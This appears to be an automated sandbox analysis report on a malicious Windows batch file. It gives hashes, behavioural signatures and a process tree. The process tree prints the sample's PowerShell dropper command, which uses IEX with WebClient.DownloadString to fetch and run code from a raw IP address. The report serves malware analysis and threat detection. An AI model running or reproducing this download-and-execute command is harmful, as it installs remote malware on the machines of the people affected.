Analysis
-
max time kernel
13s -
max time network
50s -
platform
windows7_x64 -
resource
win7 -
submitted
01-09-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
484333e52a633dd4ddba453c88728166.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
484333e52a633dd4ddba453c88728166.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
484333e52a633dd4ddba453c88728166.bat
-
Size
220B
-
MD5
78a20a9e11dcafee6975c27337f224f6
-
SHA1
bf2f2d540d8c622f2c35950b2517e06bd1ffa085
-
SHA256
bdb3f36c480f19ec8d2aa9a181d0f606f53586ba44e2065be4b5a94cc4460913
-
SHA512
206fdef2f70c68a78c5a261d15e795faf814384a3124f9dc149ce215eb15e9b2fb7dea1aef79183228a5af6d014bd3dc6cacaaab6b9cbeaf81d95475406717ab
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1296 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1296 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1296 powershell.exe 1296 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1296 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1492 wrote to memory of 1296 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 1296 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 1296 1492 cmd.exe powershell.exe PID 1492 wrote to memory of 1296 1492 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\484333e52a633dd4ddba453c88728166.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166');Invoke-ZRFBQPCGMEHHZ;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296